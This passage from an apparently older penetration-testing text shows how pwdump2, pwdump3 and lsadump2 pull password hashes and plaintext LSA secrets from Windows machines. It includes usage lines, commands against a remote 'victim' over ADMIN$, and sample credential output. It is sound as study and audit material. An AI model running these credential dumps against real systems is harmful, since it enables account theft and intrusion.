Grabbing Windows Password Hashes

After reviewing the L0phtCrack section of this chapter, you may have figured out that it’s apparent that Windows password hashes can be viewed by the administrator just as easily as a Unix administrator can view the /etc/shadow file. On the other hand, the Unix /etc/shadow file is a text view that can be viewed in any text editor or simply output to the screen. The Windows SAM database is a binary format that does not lend itself to easy inspection. This is why we need tools such as pwdump or lsadump to grab a text version of the SAM database.

Pwdump

Pwdump2 (http://www.webspan.net/~tas/pwdump2/), by Todd Sabin, can be used to extract the hashed passwords from a Windows system. It is a command-line tool that must be run locally on the target system; we’ll take a look at pwdump3, which can operate remotely, later in this section.

Implementation

The program must be run locally on the system. This is version 2 of a tool first developed by Jeremy Allison of the Samba project. Unlike the first version, pwdump2 is not inhibited by SysKey encryption of the SAM database. SysKey was introduced in Windows NT in an attempt to add security to the SAM database, but its effectiveness is questionable, as we will see with pwdump2. The usage for pwdump2 is shown here:

C:\>pwdump2.exe /?     Pwdump2 - dump the SAM database. Usage: pwdump2.exe <pid of lsass.exe>

It must be run with Administrator privileges to obtain the password hashes:

C:\>pwdump2.exe     Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46... Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c... skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

You do not usually have to provide the process ID (PID) for the lsass.exe program. However, you can use some simple ways to find it with the tlist or pulist and the find command (the /i option instructs find to ignore case):

C:\>tlist | find /i "lsass"  244 LSASS.EXE     C:\>pulist | find /i "lsass" LSASS.EXE         244  NT AUTHORITY\SYSTEM     C:\>pwdump2.exe 244 Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46... Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c... skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

The only drawback with the output from pwdump2 is that L0phtCrack cannot read it. The sole reason for this is that the alphabet characters in the hashes are lowercase; L0phtCrack expects them to be uppercase. Remember that John the Ripper has no issue detecting case sensitivities.

Fortunately, the tr utility (translate characters) will set this right for those of you who wish to use the GUI cracker. Tr is common on Unix systems and Cygwin, and it has been ported for Windows as part of the Resource Kit.

[user@hediwg ]$ cat pwdump.out | tr a-z A-Z ADMINISTRATOR:500:F1E5C5EFBC8CFB7F18136FB05F77A0BF:55C77B761FFA46... ORC:501:CBC501A4D2227783CBC501A4D2227783:F523558E22C95C62A6D6D00C... SKYCLADGIRL:1013:AA5536A42EBE131BAAD3B235B51404EE:DB31A1EE00BFBEE...

Pwdump3

Pwdump3 (http://www.ebiz-tech.com/pwdump3/), by Phil Staubs, expanded the pwdump tool once more by adding remote access to a victim machine. Version pwdump3e, even encrypts remote connections to prevent malicious users from sniffing sensitive passwords. The usage for pwdump3e differs slightly:

Usage: PWDUMP3 machineName [outputFile] [userName] C:\>PwDump3.exe victim pwdump.out root C:\>type pwdump.out guest:1001:NO PASSWORD*********************:2DEAC3223C70B24E90F02... wwwadmin:500:NO PASSWORD*********************:9CBD10B05F8E69B62F2... IUSR_WWW01:1003:6E72211CDC51C9F8EB9293C3135F3985:0E2A2DCE3B6ABFBA...

For pwdump3 to work correctly, you need to be able to establish a session to the ADMIN$ share. Pwdump3 will do this for you and prompt you for the administrator password. Otherwise, you could set up a manual session to the ADMIN$ share with the net command:

C:\>net use \\victim\admin$ * /u:Administrator Type the password for \\localhost\admin$: The command completed successfully.

Lsadump2

Lsadump2 (http://razor.bindview.com/tools/desc/lsadump2_readme.html) makes the password harvesting process trivial. Another useful tool by Todd Sabin, it’s an update to an original tool created by Paul Ashton. The difference between lsadump2 and the pwdump tool suite is that lsadump2 actually dumps the plain-text password instead of the encrypted hash. Obviously, this is preferable since you won’t have to run any password-cracking utilities. Unfortunately, lsadump2 retrieves a password only if it is currently being stored in memory by the Local Security Authority (LSA). This could happen when web applications connect to SQL databases or when a backup utility connects to the system remotely to archive files.

Implementation

Lsadump2 requires Administrator access to run. The usage for lsadump2 is shown here:

C:\>lsadump2.exe Lsadump2 - dump an LSA secret. Usage: lsadump2.exe <pid of lsass.exe> <secret>

You will have to determine the PID of the lsass (just as with pwdump2):

C:\>tlist | find /i "lsass" 244 LSASS.EXE

This tool actually outputs the plain-text “secret” for security-related processes currently in memory. This secret might be the password used by a service account, phone number information for RAS services, or remote backup utility passwords. The output is formatted in two columns:

aspnet_WP_PASSWORD  61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.  4B 00 38 00                                      K.8. 

The left column represents the raw hexadecimal values related to the service. The right column contains the printable ASCII representation of the data. If you have recently installed the .NET services on your Windows 2000 system, you most likely have an ASPNET user. Lsadump2 has kindly revealed the password for that user, shown in boldface. Note that Windows stores passwords in Unicode format, which is why a null character (00) appears after each letter. Luckily, the default settings for this user do not permit it to log in remotely or execute commands.